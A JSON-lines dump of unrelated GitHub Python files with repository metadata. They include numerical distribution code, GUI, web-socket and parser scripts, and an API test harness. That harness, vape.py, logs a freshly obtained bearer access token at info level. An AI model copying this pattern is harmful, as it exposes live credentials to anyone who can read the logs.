self.get_reasonable_integration_boundaries()\n\n def f(*args):\n return self.pdf(np.array(args))\n\n integration_result = nquad(f, integration_boundaries)[0]\n\n return integration_result\n\n @beartype\n def get_reasonable_integration_boundaries(self, scalingFactor=10) -> np.ndarray:\n \"\"\"\n Returns reasonable integration boundaries for the specific distribution\n based on the mode and covariance.\n \"\"\"\n left = np.empty((self.bound_dim + self.lin_dim, 1))\n right = np.empty((self.bound_dim + self.lin_dim, 1))\n P = self.linear_covariance()\n m = self.mode()\n\n for i in range(self.bound_dim, self.bound_dim + self.lin_dim):\n left[i] = m[i] - scalingFactor * np.sqrt(\n P[i - self.bound_dim, i - self.bound_dim]\n )\n right[i] = m[i] + scalingFactor * np.sqrt(\n P[i - self.bound_dim, i - self.bound_dim]\n )\n\n return np.vstack((left, right))\n\n def mode(self):\n \"\"\"Find the mode of the distribution by calling mode_numerical.\"\"\"\n 
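# no closed-form mode in general, so fall back to the numerical optimizer\n        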
return self.mode_numerical()\n\n def linear_covariance(self, approximate_mean=None):\n \"\"\"\n Calculates the linear covariance, or calls linear_covariance_numerical\n if a non-numerical solution doesn't exist.\n\n Parameters:\n - approximate_mean : ndarray, optional\n The approximate mean to be used. If None, uses NaNs to flag for calculation.\n\n Returns:\n - C : ndarray\n The linear covariance.\n \"\"\"\n if approximate_mean is None:\n approximate_mean = np.full((self.lin_dim,), np.nan)\n\n assert approximate_mean.shape[0] == self.lin_dim\n\n return self.linear_covariance_numerical(approximate_mean)\n\n def linear_covariance_numerical(self, approximate_mean=None):\n \"\"\"\n Numerically calculates the linear covariance.\n\n Parameters:\n - approximate_mean : ndarray, optional\n The approximate mean to be used. If None, calculates the mean.\n\n Returns:\n - C : ndarray\n The linear covariance.\n \"\"\"\n if approximate_mean is None or np.any(np.isnan(approximate_mean)):\n approximate_mean = self.linear_mean_numerical()\n\n if self.bound_dim == 1 and self.lin_dim == 1:\n C, _ = nquad(\n lambda x, y: (y - approximate_mean) ** 2 * self.pdf([x, y]),\n [[0, 2 * np.pi], [-np.inf, np.inf]],\n )\n elif self.bound_dim == 2 and self.lin_dim == 1:\n C, _ = nquad(\n lambda x, y, z: (z - approximate_mean) ** 2 * self.pdf([x, y, z]),\n [[0, 2 * np.pi], [0, 2 * np.pi], [-np.inf, np.inf]],\n )\n elif self.bound_dim == 1 and self.lin_dim == 2:\n C = np.empty((2, 2))\n C[0, 0], _ = nquad(\n lambda x, y, z: (y - approximate_mean[0]) ** 2 * self.pdf([x, y, z]),\n [[0, 2 * np.pi], [-np.inf, np.inf], [-np.inf, np.inf]],\n )\n C[0, 1], _ = nquad(\n lambda x, y, z: (y - approximate_mean[0])\n * (z - approximate_mean[1])\n * self.pdf([x, y, z]),\n [[0, 2 * np.pi], [-np.inf, np.inf], [-np.inf, np.inf]],\n )\n C[1, 0] = C[0, 1]\n C[1, 1], _ = nquad(\n lambda x, y, z: (z - approximate_mean[1]) ** 2 * self.pdf([x, y, z]),\n [[0, 2 * np.pi], [-np.inf, np.inf], [-np.inf, np.inf]],\n )\n else:\n raise ValueError(\"Cannot determine linear covariance for this dimension.\")\n\n return C\n\n def condition_on_linear(self, input_lin, normalize=True):\n \"\"\"\n Condition on linear.\n\n Parameters:\n lin_input : ndarray\n Input array.\n normalize : bool, optional\n If True (default), normalizes the distribution.\n\n Returns:\n dist : CustomHypertoroidalDistribution\n The distribution after conditioning.\n \"\"\"\n assert (\n np.size(input_lin) == self.lin_dim and np.ndim(input_lin) <= 1\n ), \"Input should be of size (lin_dim,).\"\n\n def f_cond_unnorm(x, input_lin=input_lin):\n n_inputs = np.size(x) // x.shape[-1] if np.ndim(x) > 1 else np.size(x)\n input_repeated = np.tile(input_lin, (n_inputs, 1))\n return self.pdf(np.column_stack((x, input_repeated)))\n\n dist = CustomHypertoroidalDistribution(f_cond_unnorm, self.bound_dim)\n\n if normalize: # Conditional need not be normalized\n dist = dist.normalize()\n\n return dist\n\n def condition_on_periodic(self, input_periodic, normalize=True):\n \"\"\"\n Conditions the distribution on periodic variables\n\n Arguments:\n input_periodic: ndarray\n Input data, assumed to have shape (self.bound_dim,)\n normalize: bool\n If True, normalizes the distribution\n\n Returns:\n dist: CustomLinearDistribution\n CustomLinearDistribution instance\n \"\"\"\n assert (\n np.size(input_periodic) == self.bound_dim and np.ndim(input_periodic) <= 1\n ), \"Input should be of size (lin_dim,).\"\n\n input_periodic = np.mod(input_periodic, 2 * np.pi)\n\n def f_cond_unnorm(x, 
input_periodic=input_periodic):\n n_inputs = np.size(x) // x.shape[-1] if np.ndim(x) > 1 else np.size(x)\n input_repeated = np.tile(input_periodic, (n_inputs, 1))\n return self.pdf(np.column_stack((input_repeated, x)))\n\n dist = CustomLinearDistribution(f_cond_unnorm, self.lin_dim)\n\n if normalize: # Conditional may not be normalized\n dist = dist.normalize()\n\n return dist\n\n def linear_mean_numerical(self):\n # Define the integrands for the mean calculation\n if self.lin_dim == 1 and self.bound_dim == 1:\n mu = scipy.integrate.nquad(\n lambda x, y: (y * self.pdf([x, y]))[0],\n [[0, 2 * np.pi], [-np.inf, np.inf]],\n )[0]\n elif self.bound_dim == 2 and self.lin_dim == 1:\n mu = scipy.integrate.nquad(\n lambda x, y, z: (z * self.pdf([x, y, z]))[0],\n [[0, 2 * np.pi], [0, 2 * np.pi], [-np.inf, np.inf]],\n )[0]\n elif self.bound_dim == 1 and self.lin_dim == 2:\n mu = np.empty(2)\n mu[0] = scipy.integrate.nquad(\n lambda x, y, z: (y * self.pdf([x, y, z]))[0],\n [[0, 2 * np.pi], [-np.inf, np.inf], [-np.inf, np.inf]],\n )[0]\n mu[1] = scipy.integrate.nquad(\n lambda x, y, z: (z * self.pdf([x, y, z]))[0],\n [[0, 2 * np.pi], [-np.inf, np.inf], [-np.inf, np.inf]],\n )[0]\n else:\n raise ValueError(\"Cannot determine linear mean for this dimension.\")\n\n return mu\n\n def mode_numerical(self, starting_point=None):\n \"\"\"\n Find the mode of the distribution numerically.\n\n Parameters:\n starting_point : ndarray, optional\n The starting point for the optimization.\n If None, uses [pi * ones(self.bound_dim); zeros(self.lin_dim)]\n\n Returns:\n m : ndarray\n The mode of the distribution.\n \"\"\"\n if starting_point is None:\n starting_point = np.concatenate(\n [np.pi * np.ones(self.bound_dim), np.zeros(self.lin_dim)]\n )\n\n # Define bounds for the optimization\n bounds = [\n (0, 2 * np.pi) if i < self.bound_dim else (-np.inf, np.inf)\n for i in range(self.bound_dim + self.lin_dim)\n ]\n\n # Perform the optimization\n res = scipy.optimize.minimize(\n lambda x: -self.pdf(x), starting_point, bounds=bounds\n )\n\n # Check if the optimization might have stopped early\n if np.allclose(res.x, starting_point):\n print(\n \"Warning: Mode was at the starting point. 
This may indicate the optimizer stopped early.\"\n            )\n\n        return res.x\n\n    @property\n    def input_dim(self):\n        return self.dim\n","repo_name":"FlorianPfaff/pyRecEst","sub_path":"pyrecest/distributions/cart_prod/abstract_hypercylindrical_distribution.py","file_name":"abstract_hypercylindrical_distribution.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17327574228","text":"import os\nimport tkinter as tk\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\nfrom core.cnc.cnc import Cnc\nfrom core.core import Core\nfrom core.observer import Observer\nfrom core.subject import Subject\nfrom gui.componentframe import ComponentFrame\n\nclass TopBarFrame(ComponentFrame,Observer):\n    def __init__(self,parent,cnc = None) -> None:\n        super().__init__(parent)\n        self.cnc = cnc\n        self.activ_connection = False\n\n        self.img_on = ImageTk.PhotoImage(file='asset/on.png')\n        self.img_off = ImageTk.PhotoImage(file='asset/off.png')\n        self.img_alarm = ImageTk.PhotoImage(file='asset/alarm.png')\n\n        self.list_port = []\n        self.selected_port = tk.StringVar(self)\n        \n\n        self.list_design = {}\n        self.archivos = {}\n        self.selected_design = tk.StringVar(self)\n        self.selected_design.set('Ninguno')\n\n        self.upload_designs()\n        self.define_widgets()\n        \n        self.config(width=1250,height=35)\n        self.grid_propagate(0)\n\n\n    def set_cnc(self, cnc: Cnc):\n        self.cnc = cnc\n\n    def set_core(self, core : Core):\n        self.core = core\n\n    def update(self, subject: Subject) -> None:\n        self.list_port = [subject.port]\n        self.cbx_port.config(values = self.list_port)\n        self.selected_port.set(self.list_port[0])\n\n        if subject.alarm :\n            self.btn_alarm.config(image = self.img_alarm)\n            self.btn_alarm.image = self.img_alarm\n\n    def upload_designs(self):\n        \n        dir_designs = \"designs/\"\n        content = os.listdir(dir_designs)\n        for f in content:\n            ficheros = os.listdir(dir_designs+f+\"/\")\n            for a in ficheros:\n                if \".py\" in a:\n                    n = a.split(\".\")[0].replace(\"_\",\" \")\n                    self.archivos[n] = dir_designs + f + \"/\" + a\n        self.list_design = list(self.archivos.keys())\n\n\n    def define_widgets(self):\n        self.wrap1 = tk.Frame(self,width=600,height=30)\n        self.wrap1.grid_propagate(0)\n\n        self.lbl_port = tk.Label(self.wrap1, text='Port:')\n        self.cbx_port = ttk.Combobox(self.wrap1,values=self.list_port,textvariable=self.selected_port)\n\n        self.btn_conect = tk.Button(self.wrap1,text='Conectar',command=self.connect,image=self.img_off,width=80,compound = tk.LEFT)\n        self.btn_alarm = tk.Button(self.wrap1,text=' Unlock',command=self.disabled_lock,image=self.img_off,width=80,compound = tk.LEFT)\n        self.btn_alarm.image = self.img_off\n        self.lbl_design = tk.Label(self, text='Diseño:')\n        self.cbx_design = ttk.Combobox(self,values=self.list_design,textvariable=self.selected_design)\n        self.cbx_design.bind('<<ComboboxSelected>>', self.select)\n        self.lbl_port.grid(row=0,column=0,pady=2)\n        self.cbx_port.grid(row=0,column=1,pady=2)\n        self.wrap1.grid(row=0,column=0,sticky=tk.E,pady=5,padx=5)\n        self.btn_conect.grid(row=0,column=2,pady=2,padx=5)\n        self.btn_alarm.grid(row=0,column=3)\n\n        self.lbl_design.grid(row=0,column=1,padx=5,pady=5)\n        self.cbx_design.grid(row=0,column=2,pady=5,padx=5)\n\n    \n    def select(self,e):\n        self.core.file = self.archivos[self.selected_design.get()]\n\n\n    def disabled_lock(self):\n        self.cnc.disable_alarm()\n        self.btn_alarm.config(image = self.img_off)\n        self.btn_alarm.image = self.img_off\n    \n    def connect(self):\n        # Toggle the connection flag on every click of the connect button.\n        self.activ_connection = not self.activ_connection\n        \n        if self.activ_connection :\n            self.cnc.connect_serial()\n            self.btn_conect.config(image = self.img_on)\n            self.btn_conect.image = self.img_on\n        else:\n            self.btn_conect.config(image = self.img_off)\n            self.btn_conect.image = self.img_off\n","repo_name":"crcampos5/CookieMachine","sub_path":"gui/topbarframe.py","file_name":"topbarframe.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22531064565","text":"from hypothesis import settings, Phase\nimport json\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom time import sleep\nimport urllib.request\nimport schemathesis\nimport os\nimport logging\n\nDEFAULT_TIMEOUT = 1\nenvironment = 'goatfield' #os.environ.get('ENVIRONMENT_ARG')\nbase_url = 'https://api-vs.goatfield.us' #os.environ.get('BASE_URL_ARG')\nretry_attempts = int(os.environ.get('RETRY_ATTEMPTS', 60))\nretry_timeout = int(os.environ.get('RETRY_TIMEOUT', 2))\n\nif os.path.exists('apikeys.json'):\n    with open('apikeys.json') as json_file:\n        keysdict = json.load(json_file)\nelse:\n    keysdict = json.loads(os.environ.get('VS_API_KEY'))\n\n# Most of the time, if this is being run, it is right after a new environment was created,\n# and there may be a window while services are being cycled, so poll the health check\n# until it returns a 200.\nfor i in range(retry_attempts):\n    health_url = \"{}/_health/\".format(base_url)\n    try:\n        r = requests.get(health_url)\n        if r.status_code == 200:\n            break\n    except Exception as err:\n        print(\"Attempt {0}/{1} error: {2}\".format(i + 1, retry_attempts, err))\n        if i != retry_attempts - 1:\n            sleep(retry_timeout)\n\n# This is required because of this:\n# https://github.com/flasgger/flasgger/issues/267\njsonurl = urllib.request.urlopen(\"{}/v1/spec.json\".format(base_url))\nschema_dict = json.loads(jsonurl.read())\nschema_dict.pop('definitions', None)\nschema = schemathesis.from_dict(\n    schema_dict, \n    base_url=base_url, \n    skip_deprecated_operations=True,\n)\n\n# Get our access token by exchanging our keys for it.\ndef bearer_access_token():\n    query = {\n        \"grant_type\": \"refresh_token\",\n        \"client_id\": keysdict['ClientId'],\n        \"refresh_token\": keysdict['refresh_token'],\n        \"scope\": \"CognitoGroup/Developers\",\n    }\n    r = requests.post(\n        \"https://oauth.{}.us/oauth2/token\".format(environment),\n        data=query,\n        auth=HTTPBasicAuth(keysdict['ClientId'], keysdict['ClientSecret']),\n        headers={\"Content-Type\": \"application/x-www-form-urlencoded\"},\n    )\n    response = r.json()\n    try:\n        return response['access_token']\n    except KeyError:\n        logging.error(\"There was a problem authenticating to VoteShield, please check your API Key and Parameters.\")\n        raise\n\nlogging.info(bearer_access_token())\n\n# For now, population and tag routes are excluded.\n@schema.parametrize(method=\"GET\",endpoint=\"^/(?!download_population)\")\n@settings(phases=[Phase.explicit], deadline=None)\ndef test_api(case):\n    # Slow routes are defined here; their timeouts are hard-coded for now.\n
    timeout = {\n        (\"GET\", \"/changes\"): 120,\n        (\"GET\", \"/change_history\"): 60,\n        (\"GET\", \"/compare\"): 60,\n        (\"GET\", \"/download_population\"): 120,\n        (\"GET\", \"/notable_populations\"): 60,\n        (\"GET\", \"/system/snapshots\"): 60\n    }.get((case.operation.method.upper(), case.operation.path), DEFAULT_TIMEOUT)\n    case.headers = case.headers or {}\n    case.headers[\"Authorization\"] = \"Bearer \" + bearer_access_token()\n    case.call_and_validate(timeout=timeout)","repo_name":"Voteshield/VapeShield","sub_path":"src/vape.py","file_name":"vape.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1609995757","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nclass Solution:\n    def flatten(self, root: Optional[TreeNode]) -> None:\n        \"\"\"\n        Do not return anything, modify root in-place instead.\n        \"\"\"\n        if not root:\n            return root\n        \n        queue = collections.deque([])\n        \n        self.dfs(root, queue)\n        \n        # cur begins from head\n        cur = queue.popleft()\n        cur.left = None\n        \n        # Walk the rest of the queue and chain the nodes together through their right pointers\n        while queue:\n            nextnode = queue.popleft()\n            nextnode.left = None\n            cur.right = nextnode\n            cur = nextnode\n        \n        return root\n    \n    def dfs(self, root, queue):\n        # Preorder-traverse the whole tree and collect the nodes into the queue\n        if not root:\n            return root\n        queue.append(root)\n        self.dfs(root.left, queue)\n        self.dfs(root.right, queue)\n        \n# https://leetcode-cn.com/problems/flatten-binary-tree-to-linked-list/solution/dong-hua-yan-shi-si-chong-jie-fa-114-er-cha-shu-zh/\n","repo_name":"cindyyj/leetcode_solutions","sub_path":"114-flatten-binary-tree-to-linked-list/114-flatten-binary-tree-to-linked-list.py","file_name":"114-flatten-binary-tree-to-linked-list.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27899632142","text":"from channels.generic.websocket import WebsocketConsumer\nfrom channels.exceptions import StopConsumer\nimport json\nfrom django.db.models import Q\nfrom asgiref.sync import async_to_sync\nfrom business import models\n\n\nclass SpectacularsConsumers(WebsocketConsumer):\n    def websocket_connect(self, message):\n        \"\"\"Accept the incoming client connection on the server side.\"\"\"\n        group_id = self.scope['url_route']['kwargs'].get('group_id')\n        self.accept()\n        async_to_sync(self.channel_layer.group_add)(group_id, self.channel_name)\n\n    def websocket_receive(self, message):\n        \"\"\"Triggered when the client browser sends a message to the server.\"\"\"\n        veh_obj_dict = {}\n        group_id = self.scope['url_route']['kwargs'].get('group_id')\n        # Fetch the vehicles that are still in progress for each work area\n        quick_service_veh_obj = models.QuickServiceVehicle.objects.exclude(\n            Q(quick_service_status='完工交车') | Q(quick_service_status='暂停等件') | Q(quick_service_status='车辆终检'))\n        service_veh_obj = models.ServiceVehicle.objects.exclude(\n            Q(service_status='完工交车') | Q(service_status='暂停等件') | Q(service_status='车辆终检'))\n        vehicle_road_test_obj = models.VehicleRoadTest.objects.exclude(service_status='结束路试')\n        fqc_vehicle_obj = models.FQC.objects.exclude(service_status='完工交车')\n\n        # Group the quick-repair vehicles by team as {vehicle_num: status}\n        quick_teams = {'快修一组': {}, '快修二组': {}}\n        for veh_obj in quick_service_veh_obj:\n            if veh_obj.quick_service_team in quick_teams:\n                quick_teams[veh_obj.quick_service_team][veh_obj.vehicle_num] = veh_obj.quick_service_status\n        veh_obj_dict.update(quick_teams)\n\n        # Group the electromechanical vehicles by team the same way\n        service_teams = {team: {} for team in ('机电一组', '机电二组', '机电三组', '机电四组', '机电五组', '机电六组')}\n        for service_obj in service_veh_obj:\n            if service_obj.service_team in service_teams:\n                service_teams[service_obj.service_team][service_obj.vehicle_num] = service_obj.service_status\n        veh_obj_dict.update(service_teams)\n\n        veh_obj_dict['车辆路试'] = {obj.vehicle_num: obj.service_status for obj in vehicle_road_test_obj}\n        veh_obj_dict['车辆终检'] = {obj.vehicle_num: obj.service_status for obj in fqc_vehicle_obj}\n\n        async_to_sync(self.channel_layer.group_send)(group_id, {'type': 'my.send',\n                                                                'message': {'code': 'init', 'data': veh_obj_dict}})\n\n    def my_send(self, event):\n        message = event['message']\n        self.send(json.dumps(message))\n\n    def websocket_disconnect(self, message):\n        \"\"\"The client closed the connection; raise StopConsumer to shut this consumer down.\"\"\"\n        group_id = self.scope['url_route']['kwargs'].get('group_id')\n        async_to_sync(self.channel_layer.group_discard)(group_id, self.channel_name)\n        raise 
StopConsumer()\n","repo_name":"sunbo449/wms","sub_path":"wms/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21047069652","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 20 13:44:12 2022\n\n@author: Mugdho\n\"\"\"\n\nn=int(input())\nr = input().split()\nlst=list(map(int,r))\narr = sorted(lst)\nx = len(arr)\nmx = max(arr)\ny = -7\nfor i in range (0,x):\n if arr[i] expression/a\n ;\n expression/a -> muldiv/a\n ;\n muldiv/a -> parens/a\n ( \"\\*\" parens/b $ a = Multiply(a, b) $\n | \"/\" parens/b $ a = Divide(a, b) $\n )* ;\n parens/a -> \"\\(\" expression/a \"\\)\" | literal/a\n ;\n literal/a -> int/a;\n \"\"\"\n\n# Make an instance of the parser. This acts like a function.\nparse = Parser()\n\n# This is the driver code, that reads in lines, deals with errors, and\n# prints the output if no error occurs.\n\n# Open the file containing the input.\ntry:\n f = open(sys.argv[1], \"r\")\nexcept(IndexError, IOError):\n f = open(\"input1.txt\", \"r\")\n\n# For each line in f\nfor l in f:\n try:\n # Try to parse the expression.\n node = parse(l)\n\n # Try to get a result.\n result = node.evaluate()\n\n # Print the representation of the result.\n print(repr(result))\n\n # If an exception is thrown, print the appropriate error.\n except tpg.Error:\n print(\"SYNTAX ERROR\")\n # Uncomment the next line to re-raise the syntax error,\n # displaying where it occurs. Comment it for submission.\n # raise\n\n except SemanticError:\n print(\"SEMANTIC ERROR\")\n # Uncomment the next line to re-raise the semantic error,\n # displaying where it occurs. Comment it for submission.\n # raise\n\nf.close()","repo_name":"elvis-alexander/StonyBrookCS","sub_path":"cse307/cse307/tpg/template_tpg.py","file_name":"template_tpg.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10615825233","text":"def final_result(current_dict):\n result = []\n for key, values in sorted(current_dict.items()):\n result.append(values)\n return result\n\n\nto_do_dict = {}\n\ncommand = input()\n\nwhile command != \"End\":\n importance, note = command.split(\"-\")\n to_do_dict[int(importance)] = note\n\n command = input()\n\nprint(final_result(to_do_dict))","repo_name":"AlexanderBedrosyan/Programming-Fundamentals-with-Python","sub_path":"Lists Advanced - Lab/to_do_list_2.py","file_name":"to_do_list_2.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"25287050263","text":"import random\r\n\r\nfrom ants_algorithm.model.AntEnvironment import AntEnvironment\r\nfrom ants_algorithm.model.AntPathSolution import AntPathSolution\r\nfrom evolution.greedy.model.Chromosome import Chromosome\r\n\r\n\r\nclass EventProcessing:\r\n\r\n @staticmethod\r\n def process_event(environment: AntEnvironment, paths_for_demand, chromosome: Chromosome):\r\n keys = list(environment.demands.demands_map_id.keys())\r\n key_index = random.randint(0, len(keys) - 1)\r\n key = keys[key_index]\r\n old_value = environment.demands.demands_map_id[key].value\r\n new_value = old_value * 2\r\n environment.demands.demands_map_id[key].value = new_value\r\n print('Event changed demand', key, 'value from', old_value, 'to', new_value)\r\n\r\n demand_paths = paths_for_demand[key]\r\n if chromosome.path_first_or_second_map[key] == 
0:\r\n for link in demand_paths.first_path.path:\r\n chromosome.links_usage_map[link.link_id] = chromosome.links_usage_map[link.link_id] - old_value\r\n else:\r\n for link in demand_paths.second_path.path:\r\n chromosome.links_usage_map[link.link_id] = chromosome.links_usage_map[link.link_id] - old_value\r\n\r\n first_path_cost = EventProcessing.__calculate_path_cost(demand_paths.first_path, chromosome, new_value)\r\n second_path_cost = EventProcessing.__calculate_path_cost(demand_paths.second_path, chromosome, new_value)\r\n if first_path_cost <= second_path_cost:\r\n chromosome.path_first_or_second_map[key] = 0\r\n for link in demand_paths.first_path.path:\r\n EventProcessing.update_links_values(chromosome, environment, link, new_value)\r\n else:\r\n chromosome.path_first_or_second_map[key] = 1\r\n for link in demand_paths.second_path.path:\r\n EventProcessing.update_links_values(chromosome, environment, link, new_value)\r\n\r\n @staticmethod\r\n def update_links_values(chromosome, environment, link, new_value):\r\n new_demand_value = chromosome.links_usage_map[link.link_id] + new_value\r\n chromosome.links_usage_map[link.link_id] = new_demand_value\r\n if new_demand_value > link.capacity:\r\n overflow = new_demand_value - link.capacity\r\n chosen_extensions = 0\r\n while overflow > 0:\r\n max_extension = environment.capacity_extensions[len(environment.capacity_extensions) - 1]\r\n if overflow > max_extension:\r\n chosen_extensions = chosen_extensions + max_extension\r\n overflow = overflow - max_extension\r\n else:\r\n for extension in environment.capacity_extensions:\r\n if extension >= overflow:\r\n chosen_extensions = chosen_extensions + extension\r\n overflow = overflow - extension\r\n break\r\n if link.link_id in environment.capacities_extended:\r\n environment.capacities_extended[link.link_id] = environment.capacities_extended[link.link_id] + chosen_extensions\r\n else:\r\n environment.capacities_extended[link.link_id] = chosen_extensions\r\n\r\n @staticmethod\r\n def __calculate_path_cost(solution: AntPathSolution, chromosome: Chromosome, new_value):\r\n cost = 0\r\n for link in solution.path:\r\n new_value_on_link = chromosome.links_usage_map[link.link_id] + new_value\r\n cost = cost + link.cost + max(new_value_on_link - link.capacity, 0) * 10\r\n return cost\r\n","repo_name":"assist-iot/auto_configurable_network","sub_path":"software/onos-opa-example-with-delay/evolution/greedy/evaluation/EventProcessing.py","file_name":"EventProcessing.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45285984314","text":"from edge import *\nfrom point import *\n\nclass ScanLineAlgoritm():\n\n @classmethod\n def __get_active_polygons(cls, polygons):\n \"Remove from polygons sequence items without 2D representation.\"\n return [p for p in polygons if all([e.is_representation2D() for e in p.edges])]\n\n @classmethod\n def __get_edges_y_range(cls, polygons):\n \"Calculate minimum and maximum of sequence of edges on axis y.\"\n r_min = min([e.edge2D.get_axis_param('y', min) for p in polygons for e in p.edges])\n r_max = max([e.edge2D.get_axis_param('y', max) for p in polygons for e in p.edges])\n\n return (int(r_min), int(r_max))\n\n @classmethod\n def __get_y_const2D_edges_dict(cls, polygons, y_range, throwing_area):\n \"Get dictionary of edges with edge2D type Y_CONST.\"\n\n def get_cross_with_y_axis_2D(polygon, y):\n cross2D = [(e, e.edge2D.cross_with_axis('y', y)) for e in polygon.edges]\n 
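# cross_with_axis() returns a falsy value when the edge misses the scanline, so drop those pairs\n            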
cross2D = list(filter(lambda c: c[1], cross2D))\n            \n            return cross2D\n\n        def get_cross3D(cross2D):\n            cross3D = []\n            for c in cross2D:\n                if(type(c[1]) == tuple):\n                    cross3D.extend((c[0].edge3D.s_point, c[0].edge3D.e_point))\n                else:\n                    t = c[0].edge3D.get_transformation_ratio(c[1], throwing_area)\n                    cross3D.append(c[0].edge3D.get_point(t))\n            cross3D.sort(key=lambda c: c.x)\n\n            return cross3D\n\n        def get_y_const2D_edges(polygon, y):\n            edges = []\n            cross2D = get_cross_with_y_axis_2D(polygon, y)\n            cross3D = get_cross3D(cross2D)\n            for i in range(0, len(cross3D)-1, 2):\n                try:\n                    edge = Edge((cross3D[i], cross3D[i+1]), throwing_area, polygon.color)\n                    edges.append(edge)\n                except (PointException, EdgeException):\n                    pass\n\n            return edges\n\n        edges_dict = {}\n        for y in range(y_range[0], y_range[1]+1):\n            for p in polygons:\n                edges = get_y_const2D_edges(p, y)\n                edges_dict.setdefault(y, []).extend(edges)\n        \n        return edges_dict\n\n    @classmethod\n    def __get_y_const2D_subedges_dict(cls, edges_dict, throwing_area):\n        \n        def subcross_with_edge3D_init(edges):\n            subcross3D = [[e, e.edge3D.s_point, e.edge3D.e_point] for e in edges]\n            for i in range(0, len(edges)-1):\n                for j in range(i+1, len(edges)):\n                    cross2D = edges[i].edge2D.cross_with_edge(edges[j].edge2D)\n                    if(cross2D):\n                        if(type(cross2D) == tuple):\n                            for p in cross2D:\n                                t1 = edges[i].edge3D.get_transformation_ratio(p, throwing_area)\n                                p1 = edges[i].edge3D.get_point(t1)\n                                if(p1 and p1 not in subcross3D[i]): subcross3D[i].append(p1)\n                                \n                                t2 = edges[j].edge3D.get_transformation_ratio(p, throwing_area)\n                                p2 = edges[j].edge3D.get_point(t2)\n                                if(p2 and p2 not in subcross3D[j]): subcross3D[j].append(p2)\n                        else:\n                            t1 = edges[i].edge3D.get_transformation_ratio(cross2D, throwing_area)\n                            p1 = edges[i].edge3D.get_point(t1)\n                            if(p1 and p1 not in subcross3D[i]): subcross3D[i].append(p1)\n                            \n                            t2 = edges[j].edge3D.get_transformation_ratio(cross2D, throwing_area)\n                            p2 = edges[j].edge3D.get_point(t2)\n                            if(p2 and p2 not in subcross3D[j]): subcross3D[j].append(p2)\n            return subcross3D\n\n        def get_subcross_with_edge3D(edges):\n            subcross3D = subcross_with_edge3D_init(edges)\n            for i in range(0, len(edges)-1):\n                for j in range(i+1, len(edges)):\n                    cross3D = edges[i].edge3D.cross_with_edge(edges[j].edge3D)\n                    if(cross3D):\n                        if(type(cross3D) == tuple):\n                            list(map(lambda c: subcross3D[i].append(c), [c for c in cross3D if c not in subcross3D[i]]))\n                            list(map(lambda c: subcross3D[j].append(c), [c for c in cross3D if c not in subcross3D[j]]))\n                        else:\n                            if(cross3D not in subcross3D[i]): subcross3D[i].append(cross3D)\n                            if(cross3D not in subcross3D[j]): subcross3D[j].append(cross3D)\n\n            for i, sc in enumerate(subcross3D[:]):\n                subcross3D[i][1:] = sorted(sc[1:], key = lambda p3D: p3D.x)\n            \n            return subcross3D\n\n        def get_y_const2D_subedges(subcross3D):\n            subedges = []\n            for sc in subcross3D:\n                for i in range(1, len(sc)-1):\n                    try:\n                        points3D = (sc[i], sc[i+1])\n                        subedges.append(Edge(points3D, throwing_area, sc[0].color))\n                    except (PointException, EdgeException):\n                        pass\n\n            subedges.sort(key=lambda se: se.edge3D.get_axis_param('z', min), reverse=True)\n\n            return [se.edge2D for se in subedges]\n\n        subedges_dict = {}\n        for y, edges in edges_dict.items():\n            subcross3D = get_subcross_with_edge3D(edges)\n            subedges = get_y_const2D_subedges(subcross3D)\n            subedges_dict[y] = subedges\n        \n        return subedges_dict\n\n    @classmethod\n    def scan(cls, polygons, throwing_area):\n        active_polygons = 
cls.__get_active_polygons(polygons)\n if(active_polygons):\n y_range = cls.__get_edges_y_range(active_polygons)\n y_const2D_edges_dict = cls.__get_y_const2D_edges_dict(active_polygons, y_range, throwing_area)\n y_const2D_subedges_dict = cls.__get_y_const2D_subedges_dict(y_const2D_edges_dict, throwing_area)\n return y_const2D_subedges_dict\n else:\n return []","repo_name":"msparrowskyIT/vcamera","sub_path":"scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":6323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19766056680","text":"import argparse\nimport binascii\nimport json\nimport pprint\n\nimport os\nimport sys\nsys.path.append(\"../\")\n\nfrom bbc1.core import bbc_app\nfrom bbc1.core.bbc_config import DEFAULT_CORE_PORT\nfrom bbc1.core import bbclib\nfrom bbc1.core.message_key_types import KeyType\n\n\ndef wait_check_result_msg_type(callback, msg_type):\n dat = callback.synchronize()\n if dat[KeyType.command] != msg_type:\n sys.stderr.write(\"XXXXXX not expected result: %d <=> %d(received)\\n\" % (msg_type, dat[KeyType.command]))\n return dat\n\n\ndef get_neighborlist(client):\n client.get_domain_list()\n domainlist = client.callback.synchronize()\n for domain_id in domainlist:\n client.get_domain_neighborlist(domain_id=domain_id)\n dat = bbcclient.callback.synchronize()\n print(\"====== neighbor list of domain:%s =====\" % binascii.b2a_hex(domain_id).decode())\n print(\" node_id(4byte), ipv4, ipv6, port, is_domain0\")\n for k in range(len(dat)):\n node_id, ipv4, ipv6, port, domain0 = dat[k]\n if k == 0:\n print(\"*myself* %s, %s, 